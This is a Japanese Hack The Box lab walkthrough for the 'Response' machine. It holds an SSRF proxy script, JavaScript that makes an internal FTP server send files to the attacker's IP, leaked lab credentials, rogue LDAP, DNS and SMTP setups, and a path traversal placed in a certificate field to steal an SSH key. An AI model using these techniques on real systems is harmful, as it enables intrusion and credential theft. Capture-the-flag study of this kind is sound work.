ボックス情報#
| 名前 |  Response |
|---|---|
| 難易度: | 狂気 |
| ポイント: | 50 |
| リリース: | 2022 年 5 月 14 日 |
| IP: | 10.10.11.163 |
| OS: | Linux |
| レーダーグラフ: |  |
実戦#
情報収集#
ポートスキャン#
┌──(kali㉿kali)-[~/HTB]
└─$ rustscan -a 10.10.11.163
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan
[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 10.10.11.163:22
Open 10.10.11.163:80
┌──(kali㉿kali)-[~/HTB]
└─$ nmap -sC -sV -p22,80 10.10.11.163
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-15 03:54 EST
Nmap scan report for 10.10.11.163
Host is up (0.082s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 e9a4394afb065d5782fc4a0e0be46b25 (RSA)
| 256 a323e498dfb6911bf2ac2f1cc1469b15 (ECDSA)
|_ 256 fb105fda55a66b953df2e85c0336ff31 (ED25519)
80/tcp open http nginx 1.21.6
|_http-title: リダイレクトに従いませんでした http://www.response.htb
|_http-server-header: nginx/1.21.6
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.44 seconds
ディレクトリスキャン#
80 ポートはウェブページを表示しました
gobuster を実行します
┌──(kali㉿kali)-[~/HTB]
└─$ gobuster dir -u http://www.response.htb -w ~/wordlist/SecLists/Discovery/Web-Content/raft-medium-directories.txt
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://www.response.htb
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /home/kali/wordlist/SecLists/Discovery/Web-Content/raft-medium-directories.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.4
[+] Timeout: 10s
===============================================================
2023/01/15 04:02:42 Starting gobuster in directory enumeration mode
===============================================================
/css (Status: 301) [Size: 169] [--> http://www.response.htb/css/]
/img (Status: 301) [Size: 169] [--> http://www.response.htb/img/]
/assets (Status: 301) [Size: 169] [--> http://www.response.htb/assets/]
/fonts (Status: 301) [Size: 169] [--> http://www.response.htb/fonts/]
/status (Status: 301) [Size: 169] [--> http://www.response.htb/status/]
assets と status の中に何かあるかもしれないので、もう一度実行します
assets 403
Base64 変換を経て結果を得ました
{"servers":[{"id":1,"ip":"127.0.0.1","name":"Test Server"}]}
では、status/main.js.php の get_chat_status を試してみます
結果を得ました {"status":"running","vhost":"chat.response.htb"}
ユーザー権限#
chat.response.htb を得た後、hosts 記録を追加するか直接アクセスしてもウェブページを開けないので、以前の json 形式の設定を試してみます。
api.response.htb を踏み台にして
{"api_version":"1.0","endpoints":[{"desc":"get api status","method":"GET","route":"/"},{"desc":"get internal chat status","method":"GET","route":"/get_chat_status"},{"desc":"get monitored servers list","method":"GET","route":"/get_servers"}],"status":"running"}
python スクリプトを書きます
import base64
from http.server import BaseHTTPRequestHandler, HTTPServer
import random
import re
import requests
from socketserver import ThreadingMixIn
import sys
import threading
import time
hostName = "0.0.0.0"
serverPort = 80
class MyServer(BaseHTTPRequestHandler):
def do_GET(self):
self.request_handler('GET')
def do_POST(self):
self.request_handler('POST')
def request_handler(self, method):
self.random_number = random.randint(100000,999999)
path = self.path
myurl = 'http://chat.response.htb' + path
print(f"[{self.random_number}] {method} {myurl}")
if method == 'POST':
content_len = int(self.headers.get('Content-Length'))
post_body = self.rfile.read(content_len)
print(f"[{self.random_number}] body: {post_body}")
else:
post_body = None
digest = self.get_digest(myurl)
data = self.send_request_to_proxy(myurl, method, digest, post_body)
self.send_response(200)
if path.endswith('.js'):
self.send_header("Content-type", "application/javascript")
elif path.endswith('.css'):
self.send_header("Content-type", "text/css")
else:
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(data)
def get_digest(self, myurl):
url = 'http://www.response.htb/status/main.js.php'
cookies = {'PHPSESSID': myurl}
response = requests.get(url, cookies=cookies)
response.raise_for_status()
assert 'session_digest' in response.text
session_digest = re.search(r'\'session_digest\':\'([^\']+)', response.text).group(1)
#print(f"[{self.random_number}] digest: {session_digest}")
return session_digest
def send_request_to_proxy(self, myurl, method, digest, body=None):
url = 'http://proxy.response.htb/fetch'
data = {'url': myurl,
'url_digest': digest,
'method': method,
'session': '1a5455b829845168770cb337f1a05507',
'session_digest': 'd27e297b494df599e72985e6e9a166751d7de74136df9d74468aac0818c29125'}
if method == 'POST':
data['body'] = base64.b64encode(body)
response = requests.post(url, json=data)
response.raise_for_status()
assert 'body' in response.text and 'status_code' in response.text
body = response.json()['body']
status_code = response.json()['status_code']
print(f"[{self.random_number}] status_code from proxy: {status_code}; length of body: {len(body)}")
decoded_string = base64.b64decode(body)
return decoded_string
# This part is for multithreaing.
# See https://stackoverflow.com/questions/14088294/multithreaded-web-server-in-python
# Multithreading is necessary because a lot of requests are made when opening the chat application.
# Some requests take several seconds to complete. I don't want these requests to hold back the other ones.
class ThreadedHTTPServer(ThreadingMixIn, HTTPServer):
"""Handle requests in a separate thread."""
def main():
print("Edit your /etc/hosts like this:")
print("10.10.11.163 www.response.htb proxy.response.htb # HTB machine IP")
print("10.10.16.29 chat.response.htb # my VPN IP")
print("While runing this script, open http://chat.response.htb/ in the web browser\n")
# Without multithreading:
#webServer = HTTPServer((hostName, serverPort), MyServer)
# With multithreading (choose one or the other):
webServer = ThreadedHTTPServer((hostName, serverPort), MyServer)
print("Server started http://%s:%s" % (hostName, serverPort))
try:
webServer.serve_forever()
except KeyboardInterrupt:
pass
webServer.server_close()
print("Server stopped.")
if __name__ == "__main__":
main()
ウェブページを開くと
ダウンロード後、README.md を確認します
設定ファイルは server の index.js にあります
残っている従業員とチャットします
Idap サービス#
インストール
sudo apt install slapd
設定
sudo dpkg-reconfigure slapd
no を選択
response.htbを入力
organization name: response
次に Idif ファイルを作成します
dn: ou=users,dc=response,dc=htb
changetype: add
objectClass: organizationalPerson
sn:test
cn:test
dn: uid=admin,ou=users,dc=response,dc=htb
changetype: add
objectClass: inetOrgPerson
userPassword: password
sn: test
cn: test
サービスを起動します
service slapd start
ldapadd -x -D "cn=admin,dc=response,dc=htb" -w 'password' -H ldap://127.0.0.1 -f group.ldif
FTP#
チャットが終わった後、手がかりをもらいました
(yourself)
ok
bob
awesome!
i moved the internal ftp server... the new ip address is 172.18.0.2 and it is listening on port 2121. the creds are ftp_user / Secret12345
outgoing traffic from the server is currently allowed, but i will adjust the firewall to fix that
btw. would be great if you could send me the javascript article you were talking about
172.18.0.2 2121 ftp_user Secret12345
html を作成します、なぜ作成するのかはこの記事を見てください👉 https://www.serv-u.com/resources/tutorial/pasv-response-epsv-port-pbsz-rein-ftp-command
<script>
var xhr = new XMLHttpRequest();
xhr.open("POST", 'http://172.18.0.2:2121/',true);
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xhr.onreadystatechange = function() {
if (this.readyState === XMLHttpRequest.DONE &&
this.status === 200) {
}
}
xhr.send("USER ftp_user\r\nPASS Secret12345\r\nPORT 10,10,16,29,10,15\r\nLIST\r\n");
</script>
自分の IP は 10,10,16,29 です
10,15 は 10*256+15=2575 を意味します
そして実行します
python3 -m http.server 9001
nc -lvnp 2575
以前、bob は admin に用事があると言っていましたので、彼にリンクを送ります(上記の html ファイルは 1.html という名前にします)
http://私のip:9001/1.html
┌──(kali㉿kali)-[~/HTB]
└─$ nc -lvnp 2575
listening on [any] 2575 ...
connect to [10.10.16.29] from (UNKNOWN) [10.10.11.163] 39036
-rw-r--r-- 1 root root 74 Mar 16 2022 creds.txt
認証情報を得ました
では、上記のコードを少し修正します
<script>
var xhr = new XMLHttpRequest();
xhr.open("POST", 'http://172.18.0.2:2121/',true);
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xhr.onreadystatechange = function() {
if (this.readyState === XMLHttpRequest.DONE &&
this.status === 200) {
}
}
xhr.send("USER ftp_user\r\nPASS Secret12345\r\nPORT 10,10,16,29,10,15\r\nRETR creds.txt\r\n");
</script>
結果を得ました
ftp
---
ftp_user / Secret12345
ssh
---
bob / F6uXVwEjdZ46fsbXDmQK7YPY3OM
ssh を試してみます
🎉🎉🎉
┌──(kali㉿kali)-[~/HTB]
└─$ ssh [email protected]
The authenticity of host '10.10.11.163 (10.10.11.163)' can't be established.
ED25519 key fingerprint is SHA256:iPHy1XV7afTauFvMhysv/Ynl8yV39A02ZsTLR42/sd0.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.163' (ED25519) to the list of known hosts.
[email protected]'s password:
Welcome to Ubuntu 20.04.4 LTS (GNU/Linux 5.4.0-109-generic x86_64)
System load: 1.69
Usage of /: 79.2% of 8.54GB
Memory usage: 29%
Swap usage: 0%
Processes: 287
Users logged in: 0
IPv4 address for br-01fdb3f286b8: 172.19.0.1
IPv4 address for br-feb0146a542b: 172.18.0.1
IPv4 address for docker0: 172.17.0.1
IPv4 address for eth0: 10.10.11.163
IPv6 address for eth0: dead:beef::250:56ff:feb9:76ed
Last login: Sun Jan 15 04:14:32 2023 from 10.10.14.10
bob@response:~$ ls
user.txt
bob@response:~$ cat user.txt
cd**************************954
横移動#
周りを見回してもユーザー scryh 以外に利用できるものはありません
ディレクトリに入ります
bob@response:/home/scryh$ ls -liah
total 40K
532257 drwxr-xr-x 7 scryh scryh 4.0K Mar 11 2022 .
524290 drwxr-xr-x 4 root root 4.0K Mar 4 2022 ..
532271 lrwxrwxrwx 1 root root 9 Mar 4 2022 .bash_history -> /dev/null
532260 -rw-r--r-- 1 scryh scryh 220 Feb 25 2020 .bash_logout
532259 -rw-r--r-- 1 scryh scryh 3.7K Feb 25 2020 .bashrc
532263 drwx------ 3 scryh scryh 4.0K Mar 4 2022 .cache
565333 drwx------ 3 scryh scryh 4.0K Mar 11 2022 .config
173010 drwx------ 2 scryh scryh 4.0K Mar 16 2022 incident_2022-3-042
532258 -rw-r--r-- 1 scryh scryh 807 Feb 25 2020 .profile
173019 drwxr-xr-x 5 scryh scryh 4.0K Mar 17 2022 scan
532261 drwx------ 2 scryh scryh 4.0K Mar 10 2022 .ssh
incident にはアクセス権がありませんが、scan を見てみましょう
bob@response:/home/scryh/scan$ ls -liah
total 28K
173019 drwxr-xr-x 5 scryh scryh 4.0K Mar 17 2022 .
532257 drwxr-xr-x 7 scryh scryh 4.0K Mar 11 2022 ..
173020 drwxr-xr-x 4 scryh scryh 4.0K Mar 3 2022 data
173289 drwxr-xr-x 2 scryh scryh 4.0K Jan 15 12:23 output
156892 -rwxr-xr-x 1 scryh scryh 3.4K Mar 4 2022 scan.sh
173291 drwxr-xr-x 2 scryh scryh 4.0K Feb 15 2022 scripts
156894 -rwxr-xr-x 1 scryh scryh 1.3K Mar 17 2022 send_report.py
scripts の中には 3 つの nmap スクリプトがあります
bob@response:/home/scryh/scan/scripts$ ls -liah
total 68K
173291 drwxr-xr-x 2 scryh scryh 4.0K Feb 15 2022 .
173019 drwxr-xr-x 5 scryh scryh 4.0K Mar 17 2022 ..
173292 -rw-r--r-- 1 scryh scryh 9.5K Mar 3 2022 ssl-cert.nse
173293 -rw-r--r-- 1 scryh scryh 39K Feb 15 2022 ssl-enum-ciphers.nse
173294 -rw-r--r-- 1 scryh scryh 7.6K Feb 15 2022 ssl-heartbleed.nse
次の重点は nmap の 3 つのスクリプトを理解することです。もしかしたら 172.18.0.3 を自分のものに変更できるかもしれません。そうすれば xml や pdf の中に何があるかを見ることができます。
local NON_VERBOSE_FIELDS = { "commonName", "organizationName",
"stateOrProvinceName", "countryName" }
-- Test to see if the string is UTF-16 and transcode it if possible
local function maybe_decode(str)
-- If length is not even, then return as-is
if #str < 2 or #str % 2 == 1 then
return str
end
if str:byte(1) > 0 and str:byte(2) == 0 then
-- little-endian UTF-16
return unicode.transcode(str, unicode.utf16_dec, unicode.utf8_enc, false, nil)
elseif str:byte(1) == 0 and str:byte(2) > 0 then
-- big-endian UTF-16
return unicode.transcode(str, unicode.utf16_dec, unicode.utf8_enc, true, nil)
else
return str
end
end
4 つのパラメータがあり、いくつかの名前があり、data フォルダの中に見ることができます
bob@response:/home/scryh/scan/data/countryName$ ls
AD AN AW BF BN BW CG CO CY DZ ET GA GI GS HN IM JE KI KZ LS MD MM MT NA NO PE PN RE SC SK ST TF TN UA VC WS
AE AO AX BG BO BY CH CR CZ EC FI GB GL GT HR IN JM KM LA LT ME MN MU NC NP PF PR RO SD SL SV TG TO UG VE XK
AF AQ AZ BH BQ BZ CI CS DE EE FJ GD GM GU HT IO JO KN LB LU MF MO MV NE NR PG PS RS SE SM SX TH TR UM VG YE
AG AR BA BI BR CA CK CU DJ EG FK GE GN GW HU IQ JP KP LC LV MG MP MW NF NU PH PT RU SG SN SY TJ TT US VI YT
AI AS BB BJ BS CC CL CV DK EH FM GF GP GY ID IR KE KR LI LY MH MQ MX NG NZ PK PW RW SH SO SZ TK TV UY VN ZA
AL AT BD BL BT CD CM CW DM ER FO GG GQ HK IE IS KG KW LK MA MK MR MY NI OM PL PY SA SI SR TC TL TW UZ VU ZM
AM AU BE BM BV CF CN CX DO ES FR GH GR HM IL IT KH KY LR MC ML MS MZ NL PA PM QA SB SJ SS TD TM TZ VA WF ZW
stateOrProvinceName の内容は比較的長いので、../../../../.ssh/id_rsaを構築できます
output を見てみましょう
bob@response:/home/scryh/scan/output$ cat log.txt
scanning server ip 172.18.0.3
- retrieved manager uid: marie
- manager mail address: [email protected]
- failed to retrieve SMTP server for domain "response-test.htb" locally
- retrieved SMTP server for domain "response-test.htb": mail.response-test.htb.
- retrieved ip address of SMTP server: 172.18.0.3
- sending report output/scan_172.18.0.3.pdf to customer [email protected] via SMTP server 172.18.0.3
pspy を実行します
2023/01/21 08:31:01 CMD: UID=0 PID=34603 | sudo -u scryh bash -c cd /home/scryh/scan;./scan.sh
2023/01/21 08:31:01 CMD: UID=1000 PID=34605 | /bin/bash ./scan.sh
2023/01/21 08:31:01 CMD: UID=1000 PID=34604 | bash -c cd /home/scryh/scan;./scan.sh
2023/01/21 08:31:01 CMD: UID=1000 PID=34611 | grep ipHostNumber
2023/01/21 08:31:01 CMD: UID=1000 PID=34610 | /bin/bash ./scan.sh
2023/01/21 08:31:01 CMD: UID=1000 PID=34612 | cut -d -f2
2023/01/21 08:31:01 CMD: UID=1000 PID=34613 | nmap -v -Pn 172.18.0.3 -p 443 --script scripts/ssl-enum-ciphers,scripts/ssl-cert,scripts/ssl-heartbleed -oX output/scan_172.18.0.3.xml
2023/01/21 08:31:14 CMD: UID=1000 PID=34614 | wkhtmltopdf output/scan_172.18.0.3.xml output/scan_172.18.0.3.pdf
2023/01/21 08:34:15 CMD: UID=1000 PID=34852 | /usr/bin/ldapsearch -x -D cn=admin,dc=response,dc=htb -w aU4EZxEAOnimLNzk3 -s sub -b ou=customers,dc=response,dc=htb (uid=marie)
2023/01/21 08:35:15 CMD: UID=1000 PID=34959 | /usr/bin/env python3 ./send_report.py 172.18.0.3 [email protected] output/scan_172.18.0.3.pdf
2023/01/21 08:35:15 CMD: UID=0 PID=34960 | /bin/bash /root/ldap/restore_ldap.sh
2023/01/21 08:35:15 CMD: UID=0 PID=34961 | cp /root/ldap/data.mdb /root/docker/openldap/data/slapd/database/
2023/01/21 08:35:15 CMD: UID=0 PID=34962 | docker inspect -f {{range.NetworkSettings.Networks}}{{.IPAddress}}{{end}} testserver
2023/01/21 08:35:15 CMD: UID=0 PID=34968 | ldapmodify -D cn=admin,dc=response,dc=htb -w aU4EZxEAOnimLNzk3 -f /root/ldap/testserver.ldif
2023/01/21 08:37:15 CMD: UID=1000 PID=35100 | python3 ./send_report.py 172.18.0.3 [email protected] output/scan_172.18.0.3.pdf
2023/01/21 08:37:15 CMD: UID=0 PID=35101 | /bin/bash /root/ldap/restore_ldap.sh
2023/01/21 08:37:15 CMD: UID=0 PID=35102 | cp /root/ldap/data.mdb /root/docker/openldap/data/slapd/database/
2023/01/21 08:37:15 CMD: UID=0 PID=35103 | docker inspect -f {{range.NetworkSettings.Networks}}{{.IPAddress}}{{end}} testserver
2023/01/21 08:37:15 CMD: UID=0 PID=35109 | ldapmodify -D cn=admin,dc=response,dc=htb -w aU4EZxEAOnimLNzk3 -f /root/ldap/testserver.ldif
コマンドを実行して、変数を補充することを忘れないでください
bob@response:/home/scryh/scan$ bind_dn='cn=admin,dc=response,dc=htb'
bob@response:/home/scryh/scan$ pwd='aU4EZxEAOnimLNzk3'
bob@response:/home/scryh/scan$ /usr/bin/ldapsearch -x -D $bind_dn -w $pwd -s sub -b 'ou=servers,dc=response,dc=htb' '(objectclass=ipHost)'|grep ipHostNumber|cut -d ' ' -f2 #このコマンドはscan.shの一部です
172.18.0.3
bob@response:/home/scryh/scan/scripts$ /usr/bin/ldapsearch -x -D $bind_dn -w $pwd -s sub -b 'ou=servers,dc=response,dc=htb' '(objectclass=ipHost)'
# extended LDIF
#
# LDAPv3
# base <ou=servers,dc=response,dc=htb> with scope subtree
# filter: (objectclass=ipHost)
# requesting: ALL
#
# TestServer, servers, response.htb
dn: cn=TestServer,ou=servers,dc=response,dc=htb
objectClass: top
objectClass: ipHost
objectClass: device
cn: TestServer
manager: uid=marie,ou=customers,dc=response,dc=htb
ipHostNumber: 172.18.0.3
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1
スキャンしているのは 172.18.0.3 であることを確認しました
# TestServer, servers, response.htbこの部分は、サービスを偽造する際に注意が必要です
偽造を開始します
bob@response:~$ vim server.ldif
dn: cn=TestServer2,ou=servers,dc=response,dc=htb
changetype: add
objectClass: top
objectClass: ipHost
objectClass: device
cn: TestServer2
manager: uid=kali,ou=customers,dc=response,dc=htb
ipHostNumber: 10.10.14.78
サービスを追加します
ldapmodify -D cn=admin,dc=response,dc=htb -w aU4EZxEAOnimLNzk3 -f server.ldif
また、pspy が出力したように、ipHost はよくリセットされるので
定期的なスクリプトを書かなければなりません
#!/bin/bash
while [ 1 -eq 1 ]; do
ldapmodify -D cn=admin,dc=response,dc=htb -w aU4EZxEAOnimLNzk3 -f server.ldif
sleep 3
done
chmod +x test.sh
./test.sh &
確認すると
2023/01/21 10:42:14 CMD: UID=1000 PID=44453 | nmap -v -Pn 10.10.14.78 -p 443 --script scripts/ssl-enum-ciphers,scripts/ssl-cert,scripts/ssl-heartbleed -oX output/scan_10.10.14.78.xml
すでに nmap がスキャンしています
次に、メール送信情報を追加します
フォーマットを確認します
bob@response:~$ /usr/bin/ldapsearch -x -D cn=admin,dc=response,dc=htb -w aU4EZxEAOnimLNzk3 -s sub -b ou=customers,dc=response,dc=htb '(uid=marie)'
# extended LDIF
#
# LDAPv3
# base <ou=customers,dc=response,dc=htb> with scope subtree# filter: (uid=marie)
# requesting: ALL
#
# marie, customers, response.htb
dn: uid=marie,ou=customers,dc=response,dc=htb
objectClass: inetOrgPerson
cn: Marie Wiliams
sn: Marie
uid: mariemail: [email protected]
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1
vim adduser.ldif
dn: uid=kali,ou=customers,dc=response,dc=htb
changetype: add
objectClass: inetOrgPerson
cn: Marie Wiliams
sn: Marie
uid: kali
mail: [email protected]
ldapmodify -D cn=admin,dc=response,dc=htb -w aU4EZxEAOnimLNzk3 -f adduser.ldif
書き込まれたかどうか確認します
bob@response:~$ ldapsearch -x -D cn=admin,dc=response,dc=htb -w aU4EZxEAOnimLNzk3 -s sub -b ou=customers,dc=response,dc=htb '(uid=kali)'
# extended LDIF
#
# LDAPv3
# base <ou=customers,dc=response,dc=htb> with scope subtree
# filter: (uid=kali)
# requesting: ALL
#
# kali, customers, response.htb
dn: uid=kali,ou=customers,dc=response,dc=htb
objectClass: inetOrgPerson
cn: Marie Wiliams
sn: Marie
uid: kali
mail: [email protected]
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1
その後、自分の https サービスを立ち上げる必要があります
証明書を生成します
──(kali㉿kali)-[~/HTB/Response]
└─$ openssl genrsa -out server.key 4096
┌──(kali㉿kali)-[~/HTB/Response]
└─$ openssl req -new -key server.key -out server.csr
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:AU
State or Province Name (full name) [Some-State]:../../../.ssh/id_rsa
Locality Name (eg, city) []:
Organization Name (eg, company) [Internet Widgits Pty Ltd]:
Organizational Unit Name (eg, section) []:
Common Name (e.g. server FQDN or YOUR name) []:10.10.14.78
Email Address []:
Please enter the following 'extra' attributes
to be sent with your certificate request
A challenge password []:
An optional company name []:
──(kali㉿kali)-[~/HTB/Response]
└─$ openssl x509 -req -in server.csr -out server.crt -signkey server.key -days 3650
Certificate request self-signature ok
subject=C = AU, ST = ../../../.ssh/id_rsa, O = Internet Widgits Pty Ltd, CN = 10.10.14.78
┌──(kali㉿kali)-[~/HTB/Response]
└─$ cat server.key >> server.crt
# https.pyを作成します
https.py
import http.server, ssl
server_address = ('10.10.14.78',443)
httpd = http.server.HTTPServer(server_address, http.server.SimpleHTTPRequestHandler)
httpd.socket = ssl.wrap_socket(httpd.socket,
server_side=True,
certfile='server.crt',
ssl_version=ssl.PROTOCOL_TLS)
httpd.serve_forever()
DNS サービスを立ち上げる#
sudo docker run -d\
--name dnsmasq \
--restart always \
-p 10.10.14.78:53:53/udp \
-p 10.10.14.78:8080:8080 \
-v /root/dnsmasq.conf:/etc/dnsmasq.conf \
--log-opt "max-size=100m" \
-e "HTTP_USER=admin" \
-e "HTTP_PASS=admin" \
jpillora/dnsmasq
dnsmasq.conf を修正します
log-queries
no-resolv
server=1.0.0.1
server=1.1.1.1
strict-order
server=/company/10.0.0.1
address=/reponse-test.htb/10.10.14.78
address=/mail.response-test.htb/10.10.14.78
localmx
mx-host=response-test.htb,mail.response-test.htb,50
SMTP サービスを立ち上げる#
git clone https://github.com/ankraft/smtpproxy.git
cd smtpproxy
mv smtpproxy.ini.example smtpproxy.ini
# smtpproxy.iniを修正
[config]
port=25
sleeptime=30
waitafterpop=5
debuglevel=0
deleteonerror=true
[logging]
file=smtpproxy.log
size=1000000
count=10
level=INFO
[[email protected]]
localhostname=response-test.htb
smtphost=10.10.14.78
smtpsecurity=tls
smtpusername=username
smtppassword=password
popbeforesmtp=true
pophost=pop.example.com
popport=995
popssl=true
popusername=username
poppassword=password
popcheckdelay=60
returnpath=[email protected]
[[email protected]>]
use=[email protected]
すでに pdf を送信しています
2023/01/21 11:56:12 CMD: UID=1000 PID=53947 | python3 ./send_report.py 172.18.0.3 [email protected] output/scan_172.18.0.3.pdf
python https.py
python2 smtpproxy.py
┌──(root㉿kali)-[~/smtpproxy/msgs]
└─# ls -liah
total 68K
2228303 drwxr-xr-x 2 root root 4.0K Jan 21 07:12 .
2228234 drwxr-xr-x 5 root root 4.0K Jan 21 07:08 ..
2228308 -rw------- 1 root root 60K Jan 21 07:12 tmpbx7ve7.msg
メッセージを受信しました(密集恐怖症の方は見ないでください🙈)
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